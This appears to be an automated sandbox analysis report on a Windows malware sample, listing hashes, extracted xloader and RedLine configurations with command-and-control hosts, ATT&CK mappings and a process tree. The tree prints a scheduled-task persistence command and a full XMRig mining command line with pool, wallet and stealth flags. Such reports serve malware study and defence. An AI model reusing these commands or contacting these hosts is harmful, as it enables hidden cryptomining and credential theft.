Analysis

  • max time kernel
    155s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-08-2021 16:42

General

  • Target

    e8d945d2105bad763f3b1dc30f2b6142.exe

  • Size

    395KB

  • MD5

    e8d945d2105bad763f3b1dc30f2b6142

  • SHA1

    4602b1216d9e6961f2398618bc525f54b45fa4c5

  • SHA256

    29175495787385b647e6982e1743e0d928e278b44554662100f53a26a4d97907

  • SHA512

    ae2ab2af1e798b33806e24b614382b4ebd98eb1f19d3731290a4f3463c15abb1847a8f442507d7b55c6cb2fa9e79732fb34dc313f5d9689ac15434d9d5858568

Malware Config

Extracted

Family

xloader

Version

2.3

Campaign

ec33

C2

http://www.chaturvedi.fyi/ec33/

Decoy

ride-hard.net

westindiesofficial.com

technewcomer.com

anwen.ink

smarthumanresource.com

aspenhillgetaway.com

westinventures.com

sercomp.pro

fitwoop.com

advertisingviews.site

stinato.com

kidsfundshoes.com

xaufuture.com

emaildesktophelp.com

hey-events.com

v-j9.com

eurekabox.net

export-rice.net

arcadems.com

thejackparker.com

Extracted

Family

redline

Botnet

3

C2

deyrolorme.xyz:80

xariebelal.xyz:80

anihelardd.xyz:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Xloader Payload 3 IoCs
  • Executes dropped EXE 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Users\Admin\AppData\Local\Temp\e8d945d2105bad763f3b1dc30f2b6142.exe
      "C:\Users\Admin\AppData\Local\Temp\e8d945d2105bad763f3b1dc30f2b6142.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:740
      • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
        "C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3864
        • C:\Users\Admin\AppData\Roaming\4410242.exe
          "C:\Users\Admin\AppData\Roaming\4410242.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2188
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2188 -s 2128
            5⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3884
        • C:\Users\Admin\AppData\Roaming\4244674.exe
          "C:\Users\Admin\AppData\Roaming\4244674.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:3536
          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
            5⤵
            • Executes dropped EXE
            PID:2864
        • C:\Users\Admin\AppData\Roaming\1095302.exe
          "C:\Users\Admin\AppData\Roaming\1095302.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
      • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
        "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3300
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3864
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1104
        • C:\Users\Admin\AppData\Roaming\services64.exe
          "C:\Users\Admin\AppData\Roaming\services64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2228
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3364
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:2320
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            5⤵
            • Executes dropped EXE
            PID:188
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1924
      • C:\Users\Admin\AppData\Local\Temp\bin.exe
        "C:\Users\Admin\AppData\Local\Temp\bin.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
    • C:\Windows\SysWOW64\svchost.exe
      "C:\Windows\SysWOW64\svchost.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"
        3⤵
          PID:3836

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    2
    T1005

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
      MD5

      61fd8e96260e4fffb555d16085c818a8

      SHA1

      2f7a6a9d4d2f0c1e347222ca7e0d863d88104e5b

      SHA256

      8e2098f566177904903e9b219a595af6cd948b7d00fe12aed8545ea1cc4ebd59

      SHA512

      9d0772ad0494e3fa451bba3e20e72bff292271c4ad3a06c4bfac38c692421f5d43d5468d251d796f92bfb60eff4c70700c82374d11b7a3cbf199fc14843e7ee4

    • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
      MD5

      61fd8e96260e4fffb555d16085c818a8

      SHA1

      2f7a6a9d4d2f0c1e347222ca7e0d863d88104e5b

      SHA256

      8e2098f566177904903e9b219a595af6cd948b7d00fe12aed8545ea1cc4ebd59

      SHA512

      9d0772ad0494e3fa451bba3e20e72bff292271c4ad3a06c4bfac38c692421f5d43d5468d251d796f92bfb60eff4c70700c82374d11b7a3cbf199fc14843e7ee4

    • C:\Users\Admin\AppData\Local\Temp\bin.exe
      MD5

      9efb46ac666bf0cd1b417f69e58151d5

      SHA1

      79cf36a9cc63bded573593a0aa93bad550d10e30

      SHA256

      fe1f35c815222d77527faddd4b99c9a697b2fb8fe27cd45c50b5f6ca499cce63

      SHA512

      33188085909fea6fc6f646a5e8cd217abbe07cdf1ddbf48d7099b8992a6ef8cab8536606d4f6eb77bb18ad0e71d9c1287ce5855c6f436a1eb13ed6639c2e959a

    • C:\Users\Admin\AppData\Local\Temp\bin.exe
      MD5

      9efb46ac666bf0cd1b417f69e58151d5

      SHA1

      79cf36a9cc63bded573593a0aa93bad550d10e30

      SHA256

      fe1f35c815222d77527faddd4b99c9a697b2fb8fe27cd45c50b5f6ca499cce63

      SHA512

      33188085909fea6fc6f646a5e8cd217abbe07cdf1ddbf48d7099b8992a6ef8cab8536606d4f6eb77bb18ad0e71d9c1287ce5855c6f436a1eb13ed6639c2e959a

    • C:\Users\Admin\AppData\Roaming\1095302.exe
      MD5

      883fe31989c8dfc8f2e22a94ae2d369a

      SHA1

      2933d6fafbebe84c12c0e226bf182e708d3bd32e

      SHA256

      7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

      SHA512

      c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

    • C:\Users\Admin\AppData\Roaming\1095302.exe
      MD5

      883fe31989c8dfc8f2e22a94ae2d369a

      SHA1

      2933d6fafbebe84c12c0e226bf182e708d3bd32e

      SHA256

      7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

      SHA512

      c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

    • C:\Users\Admin\AppData\Roaming\4244674.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\4244674.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\4410242.exe
      MD5

      463bac4a842400e537500a5a20fbe6a8

      SHA1

      7ea66b11085e4b3626223e5573cae4c6ca421c89

      SHA256

      d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

      SHA512

      0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

    • C:\Users\Admin\AppData\Roaming\4410242.exe
      MD5

      463bac4a842400e537500a5a20fbe6a8

      SHA1

      7ea66b11085e4b3626223e5573cae4c6ca421c89

      SHA256

      d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

      SHA512

      0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      7f7246cca411275a62d7fdee50877859

      SHA1

      7e3a4e01f44ce712426a04fc2719ea7460304788

      SHA256

      989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

      SHA512

      f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      7f7246cca411275a62d7fdee50877859

      SHA1

      7e3a4e01f44ce712426a04fc2719ea7460304788

      SHA256

      989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

      SHA512

      f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\services64.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • C:\Users\Admin\AppData\Roaming\services64.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • memory/188-200-0x0000000000000000-mapping.dmp
    • memory/188-203-0x00000000009D0000-0x00000000009D1000-memory.dmp
      Filesize

      4KB

    • memory/188-207-0x000000001C340000-0x000000001C342000-memory.dmp
      Filesize

      8KB

    • memory/740-114-0x00000000008E0000-0x00000000008E1000-memory.dmp
      Filesize

      4KB

    • memory/936-157-0x0000000000C50000-0x0000000000C5C000-memory.dmp
      Filesize

      48KB

    • memory/936-155-0x0000000000000000-mapping.dmp
    • memory/936-158-0x0000000003090000-0x00000000030B8000-memory.dmp
      Filesize

      160KB

    • memory/936-163-0x0000000003990000-0x0000000003CB0000-memory.dmp
      Filesize

      3.1MB

    • memory/936-178-0x0000000003500000-0x000000000358F000-memory.dmp
      Filesize

      572KB

    • memory/1104-190-0x0000000000000000-mapping.dmp
    • memory/1924-214-0x0000000002660000-0x0000000002680000-memory.dmp
      Filesize

      128KB

    • memory/1924-215-0x0000000015AE0000-0x0000000015C47000-memory.dmp
      Filesize

      1.4MB

    • memory/1924-216-0x0000000016160000-0x0000000016180000-memory.dmp
      Filesize

      128KB

    • memory/1924-211-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1924-208-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/1924-209-0x00000001402F327C-mapping.dmp
    • memory/1924-210-0x0000000002390000-0x00000000023B0000-memory.dmp
      Filesize

      128KB

    • memory/2188-152-0x0000000000E90000-0x0000000000E92000-memory.dmp
      Filesize

      8KB

    • memory/2188-144-0x0000000000D50000-0x0000000000D9A000-memory.dmp
      Filesize

      296KB

    • memory/2188-139-0x0000000000520000-0x0000000000521000-memory.dmp
      Filesize

      4KB

    • memory/2188-136-0x0000000000000000-mapping.dmp
    • memory/2228-192-0x0000000000000000-mapping.dmp
    • memory/2228-206-0x0000000001060000-0x0000000001062000-memory.dmp
      Filesize

      8KB

    • memory/2264-173-0x0000000007DA0000-0x0000000007DA1000-memory.dmp
      Filesize

      4KB

    • memory/2264-177-0x0000000007F50000-0x0000000007F51000-memory.dmp
      Filesize

      4KB

    • memory/2264-160-0x0000000008310000-0x0000000008311000-memory.dmp
      Filesize

      4KB

    • memory/2264-164-0x0000000007D60000-0x0000000007D61000-memory.dmp
      Filesize

      4KB

    • memory/2264-186-0x00000000099B0000-0x00000000099B1000-memory.dmp
      Filesize

      4KB

    • memory/2264-154-0x0000000005710000-0x0000000005742000-memory.dmp
      Filesize

      200KB

    • memory/2264-150-0x0000000000F40000-0x0000000000F41000-memory.dmp
      Filesize

      4KB

    • memory/2264-147-0x0000000000000000-mapping.dmp
    • memory/2264-185-0x0000000009670000-0x0000000009671000-memory.dmp
      Filesize

      4KB

    • memory/2264-182-0x0000000009590000-0x0000000009591000-memory.dmp
      Filesize

      4KB

    • memory/2264-175-0x0000000005970000-0x0000000005971000-memory.dmp
      Filesize

      4KB

    • memory/2264-162-0x0000000007D00000-0x0000000007D01000-memory.dmp
      Filesize

      4KB

    • memory/2264-181-0x0000000009AC0000-0x0000000009AC1000-memory.dmp
      Filesize

      4KB

    • memory/2264-180-0x00000000093C0000-0x00000000093C1000-memory.dmp
      Filesize

      4KB

    • memory/2320-205-0x0000000000000000-mapping.dmp
    • memory/2536-179-0x0000000006060000-0x0000000006199000-memory.dmp
      Filesize

      1.2MB

    • memory/2536-135-0x0000000005E10000-0x0000000005F95000-memory.dmp
      Filesize

      1.5MB

    • memory/2820-133-0x0000000000E00000-0x0000000000F4A000-memory.dmp
      Filesize

      1.3MB

    • memory/2820-134-0x0000000000AC0000-0x0000000000AD0000-memory.dmp
      Filesize

      64KB

    • memory/2820-127-0x0000000000000000-mapping.dmp
    • memory/2864-176-0x0000000005430000-0x0000000005431000-memory.dmp
      Filesize

      4KB

    • memory/2864-174-0x00000000083A0000-0x00000000083A1000-memory.dmp
      Filesize

      4KB

    • memory/2864-165-0x0000000000000000-mapping.dmp
    • memory/3300-187-0x0000000001960000-0x000000000196A000-memory.dmp
      Filesize

      40KB

    • memory/3300-191-0x000000001D440000-0x000000001D442000-memory.dmp
      Filesize

      8KB

    • memory/3300-121-0x0000000000000000-mapping.dmp
    • memory/3300-188-0x0000000001990000-0x0000000001991000-memory.dmp
      Filesize

      4KB

    • memory/3300-124-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
      Filesize

      4KB

    • memory/3364-199-0x0000000000000000-mapping.dmp
    • memory/3536-145-0x00000000009B0000-0x00000000009B1000-memory.dmp
      Filesize

      4KB

    • memory/3536-156-0x0000000007B30000-0x0000000007B31000-memory.dmp
      Filesize

      4KB

    • memory/3536-153-0x0000000001190000-0x0000000001196000-memory.dmp
      Filesize

      24KB

    • memory/3536-141-0x0000000000000000-mapping.dmp
    • memory/3536-161-0x0000000007710000-0x0000000007711000-memory.dmp
      Filesize

      4KB

    • memory/3836-159-0x0000000000000000-mapping.dmp
    • memory/3864-132-0x000000001AF50000-0x000000001AF52000-memory.dmp
      Filesize

      8KB

    • memory/3864-131-0x0000000000930000-0x0000000000931000-memory.dmp
      Filesize

      4KB

    • memory/3864-130-0x0000000000910000-0x000000000092E000-memory.dmp
      Filesize

      120KB

    • memory/3864-126-0x0000000000900000-0x0000000000901000-memory.dmp
      Filesize

      4KB

    • memory/3864-189-0x0000000000000000-mapping.dmp
    • memory/3864-119-0x00000000000E0000-0x00000000000E1000-memory.dmp
      Filesize

      4KB

    • memory/3864-116-0x0000000000000000-mapping.dmp